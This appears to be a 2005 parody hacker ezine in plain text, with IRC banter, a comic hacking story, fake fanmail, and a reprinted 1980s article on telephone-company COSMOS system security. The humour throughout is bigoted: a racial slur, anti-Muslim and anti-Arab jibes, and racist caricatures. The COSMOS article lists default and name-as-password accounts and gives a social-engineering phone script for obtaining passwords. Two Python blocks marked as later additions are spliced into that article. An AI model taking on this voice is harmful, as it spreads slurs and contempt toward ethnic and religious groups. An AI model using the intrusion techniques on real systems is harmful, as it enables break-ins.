
L elephants avec les trunks huge 03

  

************ SPECIAL NOTE: CDEJ MEMBERSHIP **********************

CDEJ membership fee... $10,000
Getting an article in CDEJ ezine... $100,000
Being banned from nearly all efnet IRC channels... priceless.

*****************************************************************



l'elephant avec les trunks huge
izzue three
Special Christmas Edition 2005


*
/\
/ \
___ / | __
/ \|____|/ \
/ / __ \ \ <--- h0h0h0!
/ | Oo | \
\___/| |\___/\
| |_| |_| \
| |/|__|\| \
| |__| |\
| |__| |_/ / \
| @ | | @ || @ | '
| |~~| || | -J. Elephant-
'ooo' 'ooo''ooo'


"CDEJ -hack the planet"


LAWELLLAWELLLAWELLLAWELLLAWELLLAWELLLAWELLLAWELLLAWELLLA
*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=**
* *CDEJ is so elite* *
* *Dirty Field trips in the palestinian camps* *
* *Secrets of the underground* *
*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=**
* *
* o0o honorary editor of this issue: o0o *
* -monkey longarm <:D> *
* *
**=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.**
* *
* Christmas times! *
* To all of you people who don't celebrate Christmas *
* for the following reasons: *
* - being m*slim (we still refuse to pronounce it) *
* - being atheist :-o> *
* - getting drunk on the 23rd and never wake up until it's *
* too late *
* - commies and jew haters in deep denial *
* *
* "WE DON"T GIVE A FUCK!" *
**=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.**
*our newest member: m4ch14v3lli *
* "french are women" *
* *
*pet of the month: Jessie QUACKSON *
* Bird Flu infected Duck *
* *
*MONTHLY ASCII: -=:-o <-- teh efnet thug ascii *
* originally invented by hunt3rx *
* legal rights bought by CDEJ *
*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=**.**
*<s3ckz13> it's good to see some journalistic integrity within*
* the community once again *
* *
*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=**.**
*<haqrsanta> h0h0h0! *
*<zmda> nigger! *
*<w01f> I saw a tactical nuclear missile disintegrate a car *
* and was like lol *
*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=**.**

- "Feels like a deja vu!"
-Ariel Sharon
(on the 9th of December 2005, while supervising an air strike
simulation of the forthcoming bombing of the IRANian Nuclear
Fertilisation Base Camp)





*** Dictionary of Extended ASCII Art ***



:D? Thinking

:? Thinking deeply

@:D> Pillsbury Doughboy

o< Duck (with or without bird flu)

:<~ Runny nose (possibly from bird flu)

:D~ Fluid coming from mouth

8D Coke / Crack addict

x:F Same teeth as my cat

X:D Needs a haircut

x:D Just got a haircut

:-O> The Scream

>:D< The hug

{:-) Jim Carrey

@:D Conan O'Brien

#:-) Lenny Kravitz

]:-) A texan Hacker

:-)% wearing ma's perl when alone at her room :-O>

¦-)>< wearing dad's tox

*<:-)>> Santa cause it's christmas times! >:D<


(note to self: "don't forget to delete the ma's perl before posting")



[.]................................................................[.]
[x]....................[ issue # 3 15/12]..........................[x]
[.]................................................................[.]
[x]=[000] intro Monkey Longarms <:D> [x]
[.]................................................................[.]
[x]=[001] The Novel - trans :D? [x]
[.]................................................................[.]
[x]=[002] COSMOS - King Arthur [x]
[.]................................................................[.]
[x]=[003] Blue Box reinvented - Jester Sluggo [x]
[.]................................................................[.]
[x]=[004] linux-ftpd-ssl 0.17 remote root exploit -dumb0 (0day) [x]
[.]................................................................[.]
[x]=[005] Bluetooth sobexsrv remote syslog() exploit - set_ (0day)[x]
[.]................................................................[.]
[x]=[006] Outro Note - w01f [x]
[.]................................................................[.]


[000]..INTRO..INTRO..INTRO..INTRO..INTRO..INTRO..INTRO..INTRO..[0x00]
Staff:
@:D
X:D <(Hair's too long) x:D <(Ok now I got a haircut that's better)
<:D>


--< Introduction
>-- Monkey Longarms <:D>

Hey guys. Today I'd like to include some beautiful poetry from one of our
affiliate haqrs, trans. It is so beautiful :.) I encourage you all to send your
poetry in so that I can post it to the world! If your poetry is posted, and
then I get struck by lightning twice in the same day (and live), you win $100!

<ttransien> drew a cat
<ttransien> <ttransien> and a
<ttransien> <ttransien> <ttransien> cupcake
<ttransien> emoticons
<ttransien> <ttransien> <ttransien> <ttransien>
<ttransien> and said it
<ttransien> <ttransien> <ttransien> <ttransien> <ttransien>
<ttransien> was the
<ttransien> <ttransien> kitty's
<ttransien> birthday
<ttransien> <ttransien> <ttransien> <ttransien> <ttransien>
<ttransien> <ttransien> <ttransien> <ttransien>
<ttransien> in a javachat
<ttransien> <ttransien> <ttransien> <ttransien>
<ttransien> and these
<ttransien> <ttransien> other people
<ttransien> <ttransien> <ttransien> drew cakes
<ttransien> <ttransien> <ttransien> HAPPY BIRTHDAY KITTY

It is so nice. Guys I'd like to talk about a serious issue now. This is
issue of bird flu. I have done some interviews with various birds and they
all say the same thing: this issue needs more attention. White, capitalist,
republican Americans (being inherently bad :-o war is so bad donut hurt us!
donut eat meat!) have injected birds with bird flu (just like they injected
africans with aids (after which africans subsequently 'injected' it into one
another!)). Here is an interview with a prominent duck activist, Jesse
Quackson, taken from IRC.

<Quackson> Thanks for having me.
<Longarms> You owe me. Ok, now tell us about how the evil republicans
are oppressing your people.
<Quackson> First of all, we have to work for a living. This is bad.
White humans have been eating us for years, so we should get
everything free, and be able to sit on ponds doing nothing
for the rest of our lives.
<Longarms> Talk about birdflu please k.thx
<Quackson> Basically I am convinced that white republican americans
injected us with bird flu and now refuse to provide us
with adequate amounts of theraflu(TM).
<Longarms> Have any proof?
<Quackson> Yes. They make more money than us. More of them go to school
than us. They live longer. This is clearly prejudiced.
<Longarms> Have you ever tried to get a job?
<Quackson> That is not the point. They OWE me. Change the subject.
Keep talking about bird flu.
<Longarms> So like, what would you like americans to do about the bird
flu problem?
<Quackson> Give us reparations. Give us all lots of ponds.
<Longarms> How will this solve your birdflu problem?
<Quackson> I'm sorry I have to go. FREE KEVIN

Ok as you can see nothing really came out of this. Today we have a nice
issue for you. The next b4b0 has not come out yet, so we're lacking technical
articles. Let's go to the fanmail.


--< Fanmail
>-- CDEJ Staff

Dear cdej -

Hey guys this zine is kewl! When I was a kid I haqd 234432 stock market
computers in the same day. Then I wore trendy european clothing and went
to raves in new york. I am a tru haqr. Can I be in yer club?

-- zero kewl

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

THIS IS AN AUTOMATICALLY GENERATED EMAIL. PLEASE DO NOT RESPOND.


Dear zero kewl -

Thank you for your interest in cdej! Every cdej candidate member goes
through a long, intensive screening process. Please begin by filling out
the membership application. It is 112 pages long and can be obtained
from #cdej/efnet. After you submit the application, a cdej member will
contact you in 10-12 months.

If accepted into further screening, you will be sent to the cdej screening
center in Quantico, VA. Here you will undergo some of the most stringent
physical and mental training on the planet. Out of the 10,000 people that
make it into this training every year, only 2 make it through.

Once through screening, you will be required to attend the advanced
astronaut training program at cape canaveral, FL, explosive ordnance school
in Kandahar, Afghanistan, and cia school in Langley, VA. You will then
be eligible for consideration by top ranking cdej members!

-----------------------------------------

Dear cdej -

Hey guys can you please help me perform acts of terrorism?

-- name withheld

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Dear name withheld -

CDEJ works with the CIA and FBI, as well as the DHS, to locate and capture
m*slim terrorist scum. In fact, we have our own 'interrogation' center
(located in various boxcars along the nation's railways) free from the
restrictions these other agencies have.

In short, we will use the email headers to trace and haq yer computer
machine, then lock you up in a train and show you videos of us haqing
arabz.

--< CDEJ Prophile: trans
>-- CDEJ staff (monkey longarms)

Name: trans
Age: 62
Job: haqr
Home: Beirut Lebanon
Car: Don't have one
Pet: Ostrich
Girl: Don't have one
Comp: Don't have one

Favorite haqr experience:
"When I broke into secret computer machines and then
had to go to jail for a night. I haqd the locks of the
prison and then got out scot-free!"


--< CDEJ: The Novel -- An Epic Tale of Haqing Computer Machines
>-- :D? mystery author :D? Is it stephen king who knows :?
>-- Or maybe it is just trans?

1 - Bad news in the Morning

I woke up about 11:30am, to the muffled sound of mom sweatin' to the
oldies in the living room. Since I was unemployed, I laid in bed for
about another 2 hours, enjoying the small glints of Monday sun that
filtered through the various rips in the black garbage bags that
covered my bedroom's windows. Arising finally from bed, ignoring
the familiar clanking and clacking sounds caused by debris falling
from my blankets onto the floor, I lit a cigarette and set out on my
daily routine.

I stretched and walked over to the corner of the room, where a card
table functioned as an improvised computer desk. The 486SX whirred
to life after I hit the switch; I sat down. Simultaneously booting
up and spitting on the carpet, I watched the BIOS routines take their
time counting memory. I could still hear mom out in the living room.
It was a bummer that she'd been out of the job. I had to deal with
her soap operas and boyfriends all day long.

I found a slice of pizza somewhere on the table and munched down.
Within a few minutes I was in what us computer experts call the
'brain' of the computer: the Disk Operating System (or DOS). You
really couldn't claim to be an expert in computers without knowing
a few DOS commands. In fact, I was more inclined to work from a
DOS prompt than the Windows GUI, just to kind of make myself feel
a little more elite. Basking in the warm glow of my talents, I typed
a few commands.

------------------------------------------------------------
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\trans> DI
'DI' is not recognized as an internal or external command,
operable program or batch file.

C:\Documents and Settings\trans>dir
Volume in drive C is elitehaqr
Volume Serial Number is 7625-8432

Directory of C:\Documents and Settings\SpecialJ

06/27/2004 12:04 AM <DIR> .
06/27/2004 12:04 AM <DIR> ..
11/21/2005 02:09 PM <DIR> Desktop
11/03/2005 06:06 PM <DIR> Favorites
06/28/2004 03:17 PM <DIR> My Documents
07/22/2005 04:11 PM <DIR> kodez
08/12/2005 11:12 AM <DIR> winnuke
08/12/2005 03:55 AM <DIR> ircdox
07/25/2005 11:55 PM <DIR> warez
11/19/2005 03:15 PM <DIR> wildcat
06/10/2004 08:20 PM <DIR> Start Menu
0 File(s) 0 bytes
11 Dir(s) 12,540,416 bytes free

C:\Documents and Settings\SpecialJ>netstat -an

Active Connections

Proto Local Address Foreign Address State
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
TCP 127.0.0.1:1026 0.0.0.0:0 LISTENING
UDP 0.0.0.0:445 *:*
UDP 0.0.0.0:1025 *:*

C:\Documents and Settings\SpecialJ>
------------------------------------------------------------

This last bit of information surprised me. There were ports
open on my computer. I'd spent a considerable amount of time
over the past 6 months studying computers, and I knew immediately
that this meant I was infected. Infected, as most hackers know,
is computer lingo for having a virus. I moved a hardcopy of CDEJ
#2 off the cardtable and onto the floor using a dramatic forearm
sweeping motion, and picked up my lit cigarette (which had
already burned a part of my mouse cord). I got to work.

------------------------------------------------------------
/join #cdej
<trans> hey guys I have some ports open can any of you help me?
<hunterx> I had ports one time I think you need to reformat, i had to
<hunterx> but then I reinstalled and there were still ports
<hunterx> make sure your windows cdrom isn't hacked like mine
/join #hack
<trans> hey guys I have some ports open can any of you help me?
** You were kicked from #hack by lothos (PhD in social engineering)
------------------------------------------------------------

LoU member lothos (notorious for his GSM frequency memorization
skills) had reacted violently to my innocuous question. LoU *had*
to be involved with this. These guys were as good as it gets. They
were even rumored to know some basic Unix, and have a history with
exotic, baffling technologies such as DDoS and warez.

I had to be careful. Everyone knows that you can't just go out
and bust LoU without proper planning. I mean, they're basically
LoD! They copied off the name (another 'legions of'), and their
premier member 'optik lenz' obviously ripped his nick from phiber
optik. They constantly write technically asinine articles to cover
up their eliteness with a fog of misperception. They were so elite
they didn't *need* to be creative or smart, so they purposely
appeared to outsiders as total morons.

Some friends of mine were going to be over at 8pm to play role
playing games. I had 8 hours.

I pulled on my wife beater
I downloaded winnuke.
I started mIRC again (it had crashed).
I put the movie 'Hackers' into my BetaMax player.
I turned on some 'techno' music.
I took out the trash.
I was ready to do my first hack.

... but first, I needed some food.


2 - The Mean Streets

I had to go to the store to get something to eat. I had about $20 worth
of foodstamps left, and it had to last me the rest of the month. As I
opened the front door, overdue notices and electricity bills drifted to the
ground like snowflakes. "Obviously", I thought to myself, "If I don't take
the first one inside, I'm not likely to take in the next 100."

I walked to the supermarket because our car had been up on blocks for
a few weeks, and probably wasn't going to be starting any time soon. I
had to hang outside the store for a couple hours because the lame assistant
manager kid wouldn't let me in wearing just my wife beater and jeans. So
I sat on the curb until I met a buddy of mine, who loaned me his shirt.

I bought some Snickers bars and a PC Gamer magazine. Down aisle 3
(feminine products, baby food, and hamburger helper) some girls started
kinda pointing and laughing to themselves. I waved at them to give them
a little thrill. I'm good with the ladies. Anyway I grabbed my stuff
and headed out the door. My friend was still out there, so we went over
to his house and smoked some doobz for about 2 weeks.

When I finally stumbled home, I had completely forgotten about LoU and
my haqr project and everything else. The day was dark and drizzly. It
was typical late November weather; brown leaves lined the sidewalks.
Their sweet smell of decay permeated the air. The crows, being especially
stubborn this year, were the only birds in sight. Their menacing 'caw'
could be heard periodically through my bedroom window and wallboards, which
had gaping holes between them.

Thunder announced itself. It would snow soon; the color of the sky
and my internal barometer left no doubt about this. It was getting
dark. Something told me that today, a seemingly normal though somewhat
cool, autumn day would be different than any other day that I'd ever
lived.

This turned out to be incorrect.


3 - :D? What was I doing? :? It is a mystery.

Eventually my mom paid the AOL and electricity bills and I got back on
mirc. After spending some time interested in Poke'mon and pogs, I
remembered the ports on my computer and logged back in to what many in
the community consider to be the heart of the haqr community: #cdej/efnet.

------------------------------------------------------------
<trans> hi
<w01f> hi
<Lozcar> welcome!
<hunterx> Hey!
<uplink> Shalom
[ ... always such a warm welcome :.) ]
<trans> can someone help me haq LoU?
<the_sniff> I have a botnet we can DDoS them
<trans> really?
<the_sniff> yeah I used it on my mom when I found out she was arab
** the_sniff was kicked by w01f (no arabs allowed)
<trans> dood i need his k0dez
------------------------------------------------------------

So to make a long story short the_sniff didn't really have a botnet
but was just lying to try to attain the rank of captain in CDEJ.
I was back to square 1. This frustration, coupled with the annoying
draft caused by a 2" hole in the floor, nearly drove me over the edge.

The anger passed, leaving in its place a good idea: social
engineering!

------------------------------------------------------------

/join #lou
trans (~nsync1985@aol.com) has joined #lou
*** trans is now known as kmitnick
<lothos> oohhh fear!
<kmitnick> hey guys kevin mitnick here
<lothos> hey mr mitnick!
<kmitnick> i was hoping you guys could help me out
<lothos> do you know the GSM frequencies for your nation?
<lothos> sure what can we help you with?
<lothos> /msg optiklenz dood dig this looser
<kmitnick> haha what looser is that? some lamer?
<kmitnick> i need access to you computer machines to
<kmitnick> do some secret haqing project
<kmitnick> involving yahoo chat
<lothos> sure. try 127.0.0.1, login: loozer pass: l4m3r
<kmitnick> SUCKERS!
<kmitnick> ./quit
/quit
------------------------------------------------------------

They had fallen for it. LoU member lothos was convinced that I
was kevin mitnick, a great haqr in the lineup of great haqrs:
caroline meinel, e.goldstein (they say he molests children but
I don't believe them!), and all the great talented people in
cDc (phear wintrojanz! phear pcanywhere!) With these kodez, I
was set. In the words of the great dade murphy: "I'm in".

If this LoU computer, no doubt residing somewhere deep in the
basement of lothos' mom's house, had ports on it, I could haq it.
I was a big fan of 'the happy hacker' and other CPM literature,
and had read all the guides to mostly harmless hacking. I was
well acquainted with telnet and port surfing. I began.


C:\> telnet 127.0.0.1 79
connection closed by remote host

They had a firewall. I had to be more creative.

C:\> ping 127.0.0.1
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.073 ms
^C

Ok I could ping flood them. This is kind of like winnuke, but
not traceable. I decided instead to wait and collect more intel.
After all, you can't just go busting down doors without knowing
what's up. Plus, my mom's check to the power company bounced.

Anyway, I don't think that LoU will be bothering me anymore, since
I have their ip address and they have ports. Some of them use unix
even though it's obsolete, but I'm pretty sure that's only optik
lenz and i don't want to deltree him anyway.


--< Ethnicity Corner
>-- Longarms

We here at CDEJ have decided to be a little more culturally sensitive.
To push this along, we've dedicated one section of each issue to topics
that highlight haqrs of non-white race, non-western background, and non-
English language. In other words, it's time for us to be prejudiced
against white Americans for once! Just like the NAACP!

Today's Ethnicity Corner subject is T'so T'sing T'su, a Chinese
hacker. He will share some of his hacking experiences in the Min-Xing
Valley!

----------------------

Hello! I T'so T'sing T'su, I called T'so shortly. Thank you very much
for hearing my list experiences of hacking abacus and computer in the
Chinese farm where I am farmer and student of engineering. I hope that you
can learn various culture hackers from this paper of experience!

In MinXing valley we have not many computer, because communist government
require all people over 5 year work in farm for 18 hours each today. I
am lucky child with computer and spend much hour on internet every weekend
when mother is at market. I have learned hacking technique from cdej and
other internet hacker that is rivaled to my kung fu technique. cdej also
know kung fu so they are friend. Monkey longarm has monkey technique, trans
has crane technique (with much crank kicking and banning), and lozcar has also
technique of arab rabit.

In china we have much doing with families and neighborhood rice and sushi
and judo and declaring war on north korea. We are busy peoples but i take the
time now then to study western culture of computer with lemonade and virus of
visual basic.

Thank you much and please adopt me!

---------------------

On a sad note, T'so was killed 3 days after emailing us this. This note was
intercepted by the communist Chinese government, and they felt that he had
revealed too much information about his country. So sad :.(






NOTE:
W01f and trans are NOT the same person, but two separate people. In
fact, each of us has 3 or 4 distinct personalities. Case solved. (Also
trans is the little brother of w01f).

TODO:

- register plskthx.com



COSMOS

COmputer System for Mainframe OperationS

Part One

by King Arthur

Introduction
%%%%%%%%%%%%

Throughout the last decade, computers have played an ever growing role in
information storage and retrieval. In most companies, computerized databases
have replaced a majority of all paper records. Where in the past it would take
10 minutes for someone to search through stacks of paper for some data, the
same information can now be retrieved from a computer in a fraction of a
second.

Previously, proprietary information could be considered "safe" in a file
cabinet; the only way to see the data would be to have physical access to the
files. Now, somebody with a computer terminal and a modem can make a quick
phone call and access private records. It's unfortunate that there are
"hackers" who try to gain unauthorized access to computers. Yet, it is just as
unfortunate that most reported computer break-ins could have been prevented if
more thought and common sense went into protecting computers.


Hackers
%%%%%%%
There have been many cases of computer crime reported by the Bell
Operating Companies (BOCs), but it is hard to say how many actual break-ins
there are. Keep in mind that the only reported cases are those which are
detected. In an interview with an anonymous hacker, I was told of one of the
break-ins that may not have ever been reported. "My friend got the number when
he misdialed his business office -- that's how we knew that it was the phone
company's. It seems this Unix was part of some real big Bellcore computer
network," says the hacker.

The hacker explains that this system was one of many systems used by the
various BOCs to allow large Centrex customers to rearrange their Centrex
groups. It seems he found a text file on the system with telephone numbers and
passwords for some of Bellcore's development systems. "On this Bellcore system
in Jersey, called CCRS, we found a list of 20 some-odd COSMOS systems....
Numbers, passwords, and wire centers from all over the country!"
He adds, "Five states to be exact."

The hacker was able to gain access to the original Unix system because, as
he says, "Those guys left all the default passwords working." He was able to
login with a user name of "games" with the password being "games." "Once we
were on we found that a large number of accounts didn't have passwords. Mary,
John, test, banana, and system were some, to name a few." From there he was
able to eventually access several COSMOS database systems -- with access to ALL
system files and resources.

COSMOS
%%%%%%
COSMOS, an acronym for the COmputer System for Mainframe OperationS, is a
database package currently supported by Bellcore. COSMOS is presently being
used by every BOC, as well as by Cincinnati Bell and Rochester Telephone.
COSMOS replaces paper record-keeping and other mechanized record systems for
plant administration. COSMOS' original purpose was to alleviate congestion in
the Main Distributing Frame (MDF) by maintaining the shortest jumpers.

It can now maintain load balance in a switch and assign office equipment,
tie pairs, bridge lifters and the like. Additional applications allow COSMOS
to aid in "cutting-over" a new switch, or even generate recent change messages
to be input into electronic switches. COSMOS is most often used for
provisioning new service and maintaining existing service, by the following
departments: The frame room (MDF), the Loop Assignment Center (LAC), the
Recent Change Memory Assistance Center (RCMAC), the network administration
center, and the repair service.

Next year COSMOS will celebrate its 15th birthday, which is quite an
accomplishment for a computer program. The first version or "generic" of
COSMOS was released by Bell Laboratories in 1974. In March 1974, New Jersey
Bell was the first company to run COSMOS, in Passaic, New Jersey. Pacific
Telesis, NYNEX, Southern Bell, and many of the other BOCs adopted COSMOS soon
after. Whereas Southwestern Bell waited until 1977, the Passaic, NJ Wire
Center is still running COSMOS today.

Originally COSMOS ran on the DEC PDP 11/45 minicomputer. The package was
written in Fortran, and ran the COSNIX operating system. Later it was adapted
to run on the DEC PDP 11/70, a larger machine. Beverly Cruse, member of
Technical Staff, COSMOS system design at Bellcore, says, "COSNIX is a
derivation of Unix 1.0, it started out from the original Unix, but it was
adapted for use on the COSMOS project. It bears many similarities to Unix, but
more to the early versions of Unix than the current... The COSMOS application
now runs on other hardware under standard Unix."


"The newest version of COSMOS runs on the standard Unix System V operating
system. We will certify it for use on particular processors, based on the
needs of our clients," says Ed Pinnes, the District Manager of COSMOS system
design at Bellcore. This Unix version of COSMOS was written in C language.
Currently, COSMOS is available for use on the AT&T 3B20 supermini computer,
running under the Unix System V operating system. "There are over 700 COSMOS
systems total, of which a vast majority are DEC PDP 11/70's. The number
fluctuates all the time, as companies are starting to replace 11/70's with the
other machines," says Cruse.

In 1981 Bell Laboratories introduced an integrated systems package for
telephone companies called the Facility Assignment Control System (FACS). FACS
is a network of systems that exchanges information on a regular basis. These
are: COSMOS, Loop Facilities Assignment and Control System (LFACS), Service
Order Analysis and Control (SOAC), and Work Manager (WM). A service order from
the business office is input into SOAC. SOAC analyzes the order and then
sends an assignment request, via the WM, to LFACS. WM acts as a packet switch,
sending messages between the other components of FACS. LFACS assigns
distribution plant facilities (cables, terminals, etc.) and sends the order
back to SOAC. After SOAC receives the information from LFACS, it sends an
assignment request to COSMOS. COSMOS responds with data for assigning central
office equipment: Switching equipment, transmission equipment, bridge lifters,
and the like. SOAC takes all the information from LFACS and COSMOS and appends
it to the service order, and sends the service order on its way.

Computer Security
%%%%%%%%%%%%%%%%%
Telephone companies seem to take the brunt of unauthorized access
attempts. The sheer number of employees and size of most telephone companies
makes it very difficult to keep tabs on everyone and everything. While
researching computer security, I found that COSMOS is a large
target for hackers. "The number of COSMOS systems around, with dial-ups on
most of the machines... makes for a lot of possible break-ins," says Cruse.
This is why it's all the more important for companies to learn how to protect
themselves.

"COSMOS is power, the whole thing is a big power trip, man. It's like Big
Brother -- you see the number of some dude you don't like in the computer. You
make a service order to disconnect it; COSMOS is too stupid to tell you from a
real telco dude," says one hacker. "I think they get what they deserve:
There's a serious dearth of security out there. If kids like us can get access
this easily, think about the real enemy -- the Russians," jokes another.

A majority of unauthorized access attempts can be traced back to an
oversight on the part of the system operators; and just as many are the fault
of the systems' users. If you can keep one step ahead of the hackers,
recognize these problems now, and keep an eye out for similar weaknesses, you
can save your company a lot of trouble.

A hacker says, "In California, a friend of mine used to be able to find
passwords in the garbage. The computer was supposed to print some garbled
characters on top of the password. Instead the password would print out AFTER
the garbled characters." Some COSMOS users have half-duplex printing
terminals. At the password prompt COSMOS is supposed to print a series of
characters and then send backspaces. Then the user would enter his or her
password. When the password is printed on top of the other characters, you
can't see what it is. If the password is being printed after the other
characters, then the printing terminal is not receiving the backspace
characters properly.
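The overprint mask as a small simulation, added here as an example and not part of King Arthur's article. On a half-duplex printing terminal the terminal itself echoes what the operator types, so what reaches the paper is the host's mask characters, the host's backspaces, then the typed password. The column model of the paper, the mask width of 8 and the sample password are assumptions made for the demonstration; the point is the check at the end, which tells a reviewer of discarded printouts whether a password is recoverable.

```python
# Added example: simulate what a half-duplex printing terminal leaves on
# paper when COSMOS prints a mask and then backspaces before the password
# prompt. The 'paper' model (one string of struck characters per column)
# and the mask width are assumptions for the demonstration.

BS = "\b"


def mask_prompt(width: int = 8) -> str:
    """Host output before the operator types: a run of mask characters
    followed by the same number of backspaces, so the carriage returns to
    the first column and the typed password is struck over the mask."""
    return "X" * width + BS * width


def render_on_paper(stream: str, honors_backspace: bool) -> list:
    """Return the paper as a list of columns. Each column is the string of
    characters printed at that position, in order. A backspace moves the
    carriage one column left if the terminal honors it; a terminal that
    drops backspaces (the failure mode in the article) keeps printing to
    the right, so the password lands after the mask in the clear."""
    paper = []
    col = 0
    for ch in stream:
        if ch == BS:
            if honors_backspace and col > 0:
                col -= 1
            continue
        while len(paper) <= col:
            paper.append("")
        paper[col] += ch
        col += 1
    return paper


def password_readable(paper: list, password: str) -> bool:
    """True if some run of columns shows exactly the password characters
    with nothing struck over them, i.e. it can be read off the printout."""
    n = len(password)
    return any(paper[i:i + n] == list(password)
               for i in range(len(paper) - n + 1))


def printout(paper: list) -> str:
    """Human-readable rendering: a column holding one character prints it,
    a column holding several prints '#' for an overstrike."""
    return "".join(c if len(c) == 1 else "#" for c in paper)


if __name__ == "__main__":
    typed = "sucker"  # constructed sample, from the article's dialogue
    for honors in (True, False):
        paper = render_on_paper(mask_prompt() + typed, honors)
        print(f"backspace honored={honors}: {printout(paper)} "
              f"readable={password_readable(paper, typed)}")
```

With backspaces honored the paper shows six overstruck columns and two bare mask characters; with backspaces dropped it shows the mask followed by the password in full, which is exactly what the hacker's friend was pulling out of the garbage.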

Another big problem is lack of password security. As mentioned before,
regarding CCRS, many accounts on some systems will lack passwords. "On COSMOS
there are these standardized account names. It makes it easier for system
operators to keep track of who's using the system. For instance: all accounts
that belong to the frame room will have an MF in them. Like MF01, you can tell
it belongs to the frame room. (MF stands for Main Frame.) Most of these names
seem to be common to most COSMOS systems everywhere. In one city, none of
these user accounts have passwords. All you need is the name of the account
and you're in. In another city, which will remain unnamed, the passwords are
the SAME AS THE DAMN NAMES! Like, MF01 has a password of MF01. These guys
must not be very serious about security."
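The three account weaknesses the hacker describes (no password at all, password equal to the account name, and the open default accounts found on the CCRS box) are mechanical to check for, and an operator can run that check before anyone else does. The script below is an added example, not code from the article or from Bellcore. Its record format, one `name:salt:sha256hex(salt + password)` line per account with an empty hash meaning no password set, is an assumption made so the example runs offline; a real host stores crypt(3)-style hashes, so `pw_hash()` is the one function to swap. The sample records are constructed.

```python
# Added example: audit an account list for the weaknesses described above,
# namely accounts with no password, passwords equal to the account name,
# and well-known default accounts. The record format
# 'name:salt:sha256hex(salt + password)', with an empty hash meaning no
# password set, is an assumption for the demonstration; real hosts use
# crypt(3) formats, so swap pw_hash() for the target's hash. The sample
# records at the bottom are constructed.
import hashlib

# Account names the article reports as open or default on CCRS/COSMOS hosts.
DEFAULT_ACCOUNTS = ("games", "system", "test", "banana", "mary", "john")


def pw_hash(salt: str, password: str) -> str:
    return hashlib.sha256((salt + password).encode()).hexdigest()


def candidates(name: str):
    """Guesses tried against every account, cheapest first, paired with
    the finding to report if one matches."""
    yield "", "empty password"
    for variant in (name, name.lower(), name.upper()):
        yield variant, "password equals account name"
    for default in DEFAULT_ACCOUNTS:
        yield default, f"default password '{default}'"


def parse(records: str):
    """Yield (name, salt, digest) from the assumed record format, skipping
    blank lines and comments."""
    for line in records.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        name, salt, digest = line.split(":", 2)
        yield name, salt, digest


def audit(records: str) -> list:
    """Return (account, finding) pairs; at most one finding per account."""
    findings = []
    for name, salt, digest in parse(records):
        if digest == "":
            findings.append((name, "no password set"))
            continue
        for guess, why in candidates(name):
            if pw_hash(salt, guess) == digest:
                findings.append((name, why))
                break
    return findings


# Constructed sample: a default account, a COSMOS-style departmental
# account with its own name as password, a password-less account, and one
# account with a real password.
SAMPLE = "\n".join([
    "# name:salt:sha256hex(salt + password)",
    "games:a1:" + pw_hash("a1", "games"),
    "MF01:b2:" + pw_hash("b2", "mf01"),
    "mary:c3:",
    "RS01:d4:" + pw_hash("d4", "correct horse battery staple"),
])

if __name__ == "__main__":
    for account, finding in audit(SAMPLE):
        print(f"{account}: {finding}")
```

The name-as-password check tries the name as typed and in both cases, since the article's MF01 example could have been entered either way; the default-account list is the one the hacker names and should be extended with whatever the local install ships with.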


One of the biggest and in my eyes one of the scariest problems around is
what hackers refer to as "social engineering". Social engineering is basically
the act of impersonating somebody else for the sake of gaining proprietary
information. "I know this guy. He can trick anybody, does the best BS job
I've ever seen. He'll call up a telco office, like the repair service bureau,
that uses COSMOS. We found that most clerks at the repair service aren't too
sharp." The hacker said the conversation would usually take the following
course:

Hacker: Hi, this is Frank, from the COSMOS computer center. We've had a
problem with our records, and I'm wondering if you could help me?

Telco: Oh, what seems to be the problem?

H: We seem to have lost some user data. Hopefully, if I can correct the
problem, you people won't lose any access time today. Could you tell me
what your system login name is?

T: Well, the one I use is RS01.

H: Hmm, this could present a problem. Can you tell me what password and wire
center you use that with?

T: Well, I just type s-u-c-k-e-r for my password, and my wire centers are: TK,
KL, GL, and PK.

H: Do you call into the system, or do you only have direct connect terminals?

T: Well, when I turn on my machine I get a direct hook up. It just tells me
to login. But I know in the back they have to dial something. Hold on,
let me check. (3 Minutes later...) Well, she says all she does is call
555-1212.

H: OK, I think I have everything taken care of. Thanks, have a nice day.

T: Good, so I'm not gonna have any problems?

H: No, but if you do just give the computer center a call, and we'll take care
of it.

T: Oh, thank you honey. Have a nice day now.

"It doesn't work all the time, but we get away with it a good part of the
time. I guess they just don't expect a call from someone who isn't really part
of their company," says the hacker. "I once social engineered the COSMOS
control center. They gave me dial-ups for several systems, and even gave me
one password. I told them I was calling from the RCMAC and I was having
trouble logging into COSMOS," says another.

This last problem illustrates a perfect example of what I mean when I say
these problems can be prevented if more care and common sense went into
computer security. "Sometimes, if we want to get in to COSMOS, but we don't
have the password, we call a COSMOS dial-up at about 5 o'clock. To logoff of
COSMOS you have to hit a CONTROL-Y. If you don't, the next person who calls
will resume where you left off. A lot of the time, people forget to logoff.
They just turn their terminals off, in the rush of going home."


The past examples do not comprise the only way hackers get into systems,
but most of the problems shown here can exist regardless of what types of
systems your company has. The second article deals with solutions to these
problems.







+--------------------------------+
| Building Your Own Blue Box |
+--------------------------------+
| By |
| Jester Sluggo |
| Released: Nov. 27, 1986 |
+--------------------------------+



This Blue Box is based on the Exar 2207 Voltage Controlled Oscillator.
There are other ways to build Blue Boxes, some being better and some not as
good, but I chose to do it this way. My reason for doing so: at the time I
started this project, about the only schematic available on BBS's was the one
